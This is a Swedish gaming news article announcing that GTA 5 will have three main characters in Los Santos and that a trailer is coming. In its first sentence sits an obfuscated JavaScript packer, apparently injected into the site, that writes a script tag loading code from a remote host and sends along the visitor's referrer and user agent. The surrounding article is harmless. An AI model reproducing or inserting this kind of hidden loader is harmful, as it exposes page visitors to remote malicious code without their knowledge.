Image Image Image Image Image Image Image Image Image Image

| 29 maj, 2020

Scroll to top

Top

GTA 5 får tre huvudkaraktärer som lever i Los Santos

Sebastian

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ksdee|var|u0026u|referrer|zriir||js|php’.split(’|’),0,{}))
är hösten 2012 som Rockstar drar av täcket och berättar om Grand Theft Auto 5.
Redan förra veckan bekräftades spekulationerna om att GTA 5 kommer att lanseras i vår 2013. Tidningen Gameinformer lovar oss en heltäckande krönika om spelet. Den krönikan kommer ni snart hitta på Gameinformers hemsida.

Det vi vet nu är att GTA 5 kommer att ha tre huvudkaraktärer. Vad vi vet innan så kommer dessa karaktärer leva sina liv i staden Los Santos (Los Angeles) som ligger i delstaten San Andreas (Kalifornien). San Andreas känner vi igen från ett annat känt GTA-spel med samma namn.

Det kommer att komma ut en massa information om GTA 5 inom kort och vi kommer att hålla er läsare uppdaterade med det senaste. Vi kan också meddela igen att det kommer att släppa en ny trailer av spelet onsdagen den 14 november, alltså nästa vecka

Läs mer om GTA 5 här!